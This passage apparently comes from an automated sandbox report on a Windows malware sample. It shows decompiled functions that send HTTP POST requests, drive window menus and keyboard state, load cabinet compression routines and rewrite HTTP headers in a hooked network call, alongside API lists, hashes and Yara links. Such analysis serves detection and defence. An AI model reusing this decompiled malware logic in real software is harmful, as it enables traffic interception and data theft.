						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
						E004163A8(_v648);
					}
					E004163A8(_t113);
					_t114 = _a4;
					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t99);
						goto L22;
					} else {
						_v648 = 4;
						_v652 = 0;
						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
							goto L21;
						} else {
							if(E004184DE( &_v668, _t99) != 0) {
								E004163A8(_t80);
							}
							E004163A8(_v656);
							E004163A8(_v656);
							 *((intOrPtr*)(_t114 + 8)) = _v668;
							goto L25;
						}
					}
				}
			}

0x00415355
0x0041535e
0x0041536f
0x0041557c
0x00415584
0x00415584
0x00415381
0x00415387
0x0041538d
0x0041556a
0x0041556e
0x00415577
0x00000000
0x00415577
0x004153a2
0x004153a8
0x004153ae
0x00415560
0x00415564
0x00000000
0x00415564
0x004153b4
0x004153ba
0x004153bf
0x004153c1
0x004153c1
0x004153f7
0x004153f9
0x004153ff
0x00415556
0x0041555a
0x00000000
0x00415405
0x0041540a
0x00415415
0x00415416
0x0041541e
0x00415423
0x00415430
0x00415435
0x0041543a
0x00415448
0x00415452
0x00415452
0x0041543a
0x0041545d
0x0041545e
0x0041546c
0x0041547b
0x0041547f
0x00415497
0x00415481
0x0041548c
0x00415491
0x00415491
0x0041549b
0x004154c0
0x004154ca
0x004154ca
0x004154d0
0x004154d5
0x004154ec
0x0041554f
0x00415550
0x00000000
0x004154ee
0x004154ff
0x00415507
0x00415514
0x00000000
0x00415520
0x0041552c
0x0041552f
0x0041552f
0x00415538
0x00415541
0x0041554a
0x00000000
0x0041554a
0x00415514
0x004154ec

APIs

Part of subcall function 0041AE08: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041AE37

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00415381
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004153A2
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 004153F1
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00415448
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004154C0
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 004154E3
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 0041550B
InternetCloseHandle.WININET(00000000), ref: 00415550
InternetCloseHandle.WININET(?), ref: 0041555A

Part of subcall function 004184DE: InternetQueryOptionA.WININET(-004228D8,00000022,00000000,?), ref: 004184F2
Part of subcall function 004184DE: GetLastError.KERNEL32 ref: 004184FC
Part of subcall function 004184DE: InternetQueryOptionA.WININET(00000022,00000022,00000000,?), ref: 0041851C

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

InternetCloseHandle.WININET(?), ref: 00415564

Strings

POST, xrefs: 004153BA
GET, xrefs: 004153C1, 004153EC
HTTP/1.1, xrefs: 004153E3

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: 0bdd89c34fe9eef0bca58da9f764c299d5242de756ca936541a0e1e04515c5c5
Instruction ID: d2a8cd2bcfd3fb7620bc9c77f006be8acb69721057e53ef99e69e82a05f685d2
Opcode Fuzzy Hash: 0bdd89c34fe9eef0bca58da9f764c299d5242de756ca936541a0e1e04515c5c5
Instruction Fuzzy Hash: 0751BA72004301BBCB11AF61CD49EDFBFAAAFC8354F00092AF545A2271D738D984DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408210, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00408210(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x4228f0);
					L23:
					SetEvent( *0x4228ec);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E0041CB6F( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x4228e0, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x4228f0; // 0x0
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}

0x00408210
0x00408216
0x0040821f
0x00408222
0x004083a1
0x004083a7
0x004083ad
0x004083bb
0x004083bb
0x00408228
0x00408370
0x0040837c
0x0040838c
0x00408390
0x00408394
0x00000000
0x00408237
0x00408240
0x00408244
0x00000000
0x00000000
0x0040824a
0x00408250
0x00408256
0x00408258
0x00408263
0x00408289
0x00408289
0x0040828e
0x004082a4
0x004082a9
0x00000000
0x00000000
0x004082b8
0x004082c0
0x004082c2
0x004082c2
0x004082d2
0x004082dc
0x004082f2
0x00408341
0x00408349
0x00408352
0x00000000
0x00000000
0x00408354
0x00408362
0x00000000
0x00408362
0x00408343
0x00000000
0x00408343
0x004082fc
0x00408300
0x00408331
0x00408331
0x00408300
0x00000000
0x00000000
0x00000000
0x00000000
0x00408265
0x00408265
0x00408270
0x00408278
0x0040827e
0x0040827e
0x00408282
0x00408283
0x00000000
0x00408265

APIs

GetMenu.USER32(?), ref: 0040823A
GetMenuItemCount.USER32 ref: 00408250
GetMenuState.USER32 ref: 00408268
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00408278
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040829E
GetMenuState.USER32 ref: 004082B2
EndMenu.USER32 ref: 004082C2
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 004082D2
GetSubMenu.USER32 ref: 004082F6
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 00408310
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 00408331
GetMenuItemID.USER32(00000000,00000000), ref: 00408349
SendMessageW.USER32(?,00000111,?,00000000), ref: 00408362
SetKeyboardState.USER32 ref: 004083A1
SetEvent.KERNEL32 ref: 004083AD

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: faa9f9a26b25cca0c83c5a70e68291b6b8aa994f7a61f6927e60d1c9f1f7d467
Instruction ID: 73f3e8c21218699856508977a9ca5b156e00ce5e360b53b26d0eecd0168d86d0
Opcode Fuzzy Hash: faa9f9a26b25cca0c83c5a70e68291b6b8aa994f7a61f6927e60d1c9f1f7d467
Instruction Fuzzy Hash: 29419930004304AFD7119F24DE88A6B7AA8FB85B64F00463EFDD5A11F0CB79C905DAA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A08E, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A08E() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;

				if( *0x424020 != 0) {
					L9:
					 *0x424020 =  *0x424020 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x42401c = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x424008 = GetProcAddress(_t2, "FCICreate");
						 *0x42400c = GetProcAddress( *0x42401c, "FCIAddFile");
						 *0x423240 = GetProcAddress( *0x42401c, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x42401c, "FCIDestroy");
						 *0x424014 = _t7;
						if( *0x424008 == 0 ||  *0x42400c == 0 ||  *0x423240 == 0 || _t7 == 0) {
							L7:
							FreeLibrary( *0x42401c);
							goto L8;
						} else {
							_t9 = HeapCreate(0, 0x80000, 0);
							 *0x42323c = _t9;
							if(_t9 != 0) {
								goto L9;
							} else {
								goto L7;
							}
						}
					}
				}
			}

0x0041a097
0x0041a142
0x0041a142
0x0041a14b
0x0041a09d
0x0041a0a2
0x0041a0a8
0x0041a0af
0x0041a13e
0x0041a141
0x0041a0b5
0x0041a0cf
0x0041a0e1
0x0041a0f3
0x0041a0f8
0x0041a0fa
0x0041a106
0x0041a132
0x0041a138
0x00000000
0x0041a11c
0x0041a123
0x0041a129
0x0041a130
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a130
0x0041a106
0x0041a0af

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041A175,?,0041A391,?,?,00000000,?), ref: 0041A0A2
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0041A0C2
GetProcAddress.KERNEL32(FCIAddFile), ref: 0041A0D4
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0041A0E6
GetProcAddress.KERNEL32(FCIDestroy), ref: 0041A0F8
HeapCreate.KERNEL32(00000000,00080000,00000000,0041A391,?,?,00000000,?), ref: 0041A123
FreeLibrary.KERNEL32(0041A391,?,?,00000000,?), ref: 0041A138

Strings

cabinet.dll, xrefs: 0041A09D
FCIDestroy, xrefs: 0041A0E8
FCICreate, xrefs: 0041A0BC
FCIAddFile, xrefs: 0041A0C4
FCIFlushCabinet, xrefs: 0041A0D6

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: a1a42db360ef3ee7bd6f9eb33ae6896c251c27c8c0c64e55c6b4e31ca721290a
Instruction ID: 6b50afa5e87b1249edae2e54fe58a54c5a8d9997ea678dcde8da3171a73c353f
Opcode Fuzzy Hash: a1a42db360ef3ee7bd6f9eb33ae6896c251c27c8c0c64e55c6b4e31ca721290a
Instruction Fuzzy Hash: 66113C70B85210EACB31AFA4BD089967B61F7D87117A48537E644A2274D73848D3EF2D

Uniqueness

Uniqueness Score: -1.00%

Function 00413612, Relevance: 19.8, APIs: 9, Strings: 4, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00413612(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _v44;
				void* _v60;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				void* _v96;
				intOrPtr _v104;
				signed int _v108;
				void* _v112;
				void* _v132;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				void* _t207;

				_t207 = (_t205 & 0xfffffff8) - 0x5c;
				if(E0040EEE1() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x42306c(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x42307c);
					_t192 = _a4;
					_t184 = E00412696(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x42307c);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x423098;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x42307c);
						_t195 = _a4;
						_t114 =  *0x42306c(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x42307c);
							_t115 = E00412696(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x423098;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4337788
									_v88 =  *(_t117 + 0x28);
									E0041645B(E004163A8( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x423078(0xffffe890, 8);
							}
							LeaveCriticalSection(0x42307c);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x42307c);
						_t197 = _a4;
						_t121 =  *0x42306c(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x42307c);
							_t122 = E00412696(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x423098;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E00412754(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x423078(0xffffe890, 8);
							}
							LeaveCriticalSection(0x42307c);
						}
						goto L36;
					}
					_t125 = E00412B8A( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E004152C2( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E00414994( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E004163FB(__eflags, _a8, _a12);
								 *(_t207 + 0x10) = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E0041532C( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E004163A8( *(_t186 + 0x14));
									E004163A8( *((intOrPtr*)(_t186 + 4)));
									_t149 = E00416806(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
									 *((intOrPtr*)(_t207 + 0x14)) = E0041B2D1(E0041B2D1(E0041B34D(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E0041532C( *((intOrPtr*)(_t207 + 0x60)), _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E004152C2( &_v76);
								_t70 = _t186 + 0x24;
								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E00412E6A(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E004163A8( *((intOrPtr*)(_t207 + 0x44)));
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E004163A8(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E004152C2( &_v76);
							LeaveCriticalSection(0x42307c);
							_t111 =  *0x423078(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E00412754(_v84);
						E004152C2( &_v76);
						goto L8;
					}
				}
			}

0x00413618
0x00413625
0x0041369d
0x004136a6
0x00000000
0x00413633
0x00413639
0x0041363f
0x00413647
0x00413649
0x00413650
0x00413696
0x00413697
0x00000000
0x00413697
0x00413655
0x0041365f
0x0041383b
0x0041383b
0x00413847
0x00413849
0x00413851
0x00413855
0x0041385e
0x00413862
0x00413865
0x00413868
0x0041386e
0x00413873
0x00413876
0x0041388d
0x00413894
0x0041389a
0x0041389c
0x004138bb
0x004138be
0x004138be
0x004138be
0x004138c1
0x0041389e
0x004138a1
0x004138a6
0x004138b4
0x004138b4
0x00413878
0x00413878
0x00413883
0x0041388a
0x004138ca
0x004138ca
0x004138d0
0x004138d0
0x004136af
0x004136b5
0x004136b5
0x00413669
0x004138ec
0x004138f3
0x004138f8
0x004138ff
0x00413908
0x0041390c
0x0041390f
0x00413912
0x00413918
0x0041391d
0x00413920
0x0041393c
0x00413942
0x00413945
0x00413949
0x00413954
0x0041394b
0x0041394f
0x0041394f
0x00413922
0x00413922
0x0041392d
0x00413934
0x0041395a
0x0041395a
0x00000000
0x0041390f
0x0041367a
0x0041367f
0x00413686
0x004136b8
0x004136bc
0x004138d9
0x004138dd
0x004138e6
0x004138e6
0x004138e9
0x00000000
0x004138e9
0x004136c7
0x004136cc
0x004136d0
0x004136d2
0x004136f8
0x004136fc
0x00413700
0x00413702
0x00413713
0x00413715
0x00413719
0x0041371b
0x00413732
0x0041373a
0x00413742
0x0041374f
0x00413754
0x00413758
0x00413758
0x00413758
0x00413761
0x00413770
0x00413778
0x00413798
0x0041371d
0x00413725
0x00413725
0x0041371b
0x0041379c
0x004137a1
0x00413808
0x00413808
0x0041380d
0x00000000
0x00000000
0x00413817
0x00413820
0x00413820
0x00413820
0x00413824
0x0041382b
0x00413832
0x00413838
0x00000000
0x00413838
0x004137a3
0x004137a7
0x004137a9
0x004137b3
0x004137ab
0x004137ab
0x004137ae
0x004137ae
0x004137b7
0x004137d6
0x004137da
0x004137df
0x004137e4
0x004137fd
0x00413800
0x00413803
0x00413803
0x004137e6
0x004137e6
0x004137e9
0x00000000
0x00000000
0x004137f3
0x004137f7
0x004137f7
0x00000000
0x004136d4
0x004136d8
0x004136de
0x004136f3
0x00000000
0x004136f3
0x00413688
0x0041368c
0x00413691
0x00000000
0x00413691
0x00413686

APIs

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

EnterCriticalSection.KERNEL32(0042307C), ref: 00413639
LeaveCriticalSection.KERNEL32(0042307C), ref: 00413697
LeaveCriticalSection.KERNEL32(0042307C,?), ref: 004136DE
LeaveCriticalSection.KERNEL32(0042307C), ref: 00413849
EnterCriticalSection.KERNEL32(0042307C), ref: 00413868
LeaveCriticalSection.KERNEL32(0042307C), ref: 004138CA
LeaveCriticalSection.KERNEL32(0042307C), ref: 004138F3
EnterCriticalSection.KERNEL32(0042307C), ref: 00413912
LeaveCriticalSection.KERNEL32(0042307C), ref: 0041395A

Strings

|0B, xrefs: 00413633
If-Modified-Since, xrefs: 0041378C
identity, xrefs: 0041375C
Accept-Encoding, xrefs: 00413768

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity$|0B
API String ID: 3286975823-3303431891
Opcode ID: 095d6681bb70f0742b4ce8830c807554461b696a0c9a977553da09480a0b5bdd
Instruction ID: f7a9125eb2f926b7fe9ab612fcc7f4f6cfbe0c36b05f12150c94924c615d8d2a
Opcode Fuzzy Hash: 095d6681bb70f0742b4ce8830c807554461b696a0c9a977553da09480a0b5bdd
Instruction Fuzzy Hash: 2FA17171504701EFCB10EF24D845A9EBBE0FF44715F104A2EF865A72A1C738EA95CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00407F44, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407F44(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t1 =  &(_t41[7]); // 0x0
				_t15 =  *_t1;
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t2 =  &(_t41[3]); // 0x0
				_t16 =  *_t2;
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t3 =  &(_t41[1]); // 0x0
				_t17 =  *_t3;
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t4 =  &(_t41[5]); // 0x0
				_t18 =  *_t4;
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t5 =  &(_t41[4]); // 0x0
				_t19 =  *_t5;
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t7 =  &(_t41[0x56]); // 0x0
					_t21 =  *_t7;
					if(_t21 != 0) {
						_t8 =  &(_t41[0x55]); // 0x0
						SelectObject( *_t8, _t21);
					}
					_t9 =  &(_t41[0x57]); // 0x0
					_t22 =  *_t9;
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t10 =  &(_t41[0x55]); // 0x0
					_t23 =  *_t10;
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t11 =  &(_t41[0x58]); // 0x0
					_t24 =  *_t11;
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t12 =  &(_t41[0x60]); // 0x0
					_t25 =  *_t12;
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						_t13 =  &(_t41[0x62]); // 0x0
						PostThreadMessageW( *_t13, 0x12, 0, 0);
					}
					_t20 = E00417DB7( &(_t41[0x5f]));
				}
				return _t20;
			}

0x00407f4c
0x00407f4e
0x00407f4e
0x00407f54
0x00407f57
0x00407f57
0x00407f59
0x00407f59
0x00407f64
0x00407f67
0x00407f67
0x00407f69
0x00407f69
0x00407f6f
0x00407f72
0x00407f72
0x00407f78
0x00407f78
0x00407f7d
0x00407f80
0x00407f80
0x00407f82
0x00407f82
0x00407f87
0x00407f8a
0x00407f8a
0x00407f90
0x00407f94
0x00407f97
0x00407f97
0x00407f9e
0x00407fa0
0x00407fa0
0x00407fa8
0x00407fab
0x00407fb1
0x00407fb1
0x00407fb7
0x00407fb7
0x00407fbf
0x00407fc2
0x00407fc2
0x00407fc4
0x00407fc4
0x00407fcc
0x00407fcf
0x00407fcf
0x00407fd5
0x00407fd5
0x00407fdd
0x00407fe0
0x00407fe0
0x00407fe2
0x00407fe2
0x00407fea
0x00408002
0x00408008
0x00408008
0x00408014
0x00408014
0x0040801c

APIs

DeleteObject.GDI32(00000000), ref: 00407F57
CloseHandle.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F67
TlsFree.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F72
CloseHandle.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F80
UnmapViewOfFile.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F8A
CloseHandle.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F97
SelectObject.GDI32(00000000,00000000), ref: 00407FB1
DeleteObject.GDI32(00000000), ref: 00407FC2
DeleteDC.GDI32(00000000), ref: 00407FCF
CloseHandle.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407FE0
WaitForSingleObject.KERNEL32(00000000,00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407FEF
PostThreadMessageW.USER32 ref: 00408008

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: e1931e726338d5d7c0707eb620d881f59aa4bf5d34cade9d11e8241ad7df0f14
Instruction ID: bbb89d4863fd8f905a1d22a1898c0a9862d0f77f870902f20f62b8a962c2d561
Opcode Fuzzy Hash: e1931e726338d5d7c0707eb620d881f59aa4bf5d34cade9d11e8241ad7df0f14
Instruction Fuzzy Hash: 05212C706047029BD7209B79DD48B57B3ECAF44751F04493AE895F32E0CB78F8448A29

Uniqueness

Uniqueness Score: -1.00%

Function 004132F8, Relevance: 16.7, APIs: 6, Strings: 5, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004132F8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v20;
				void* _v24;
				void* _v28;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v72;
				void* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				signed int _t195;
				void* _t197;
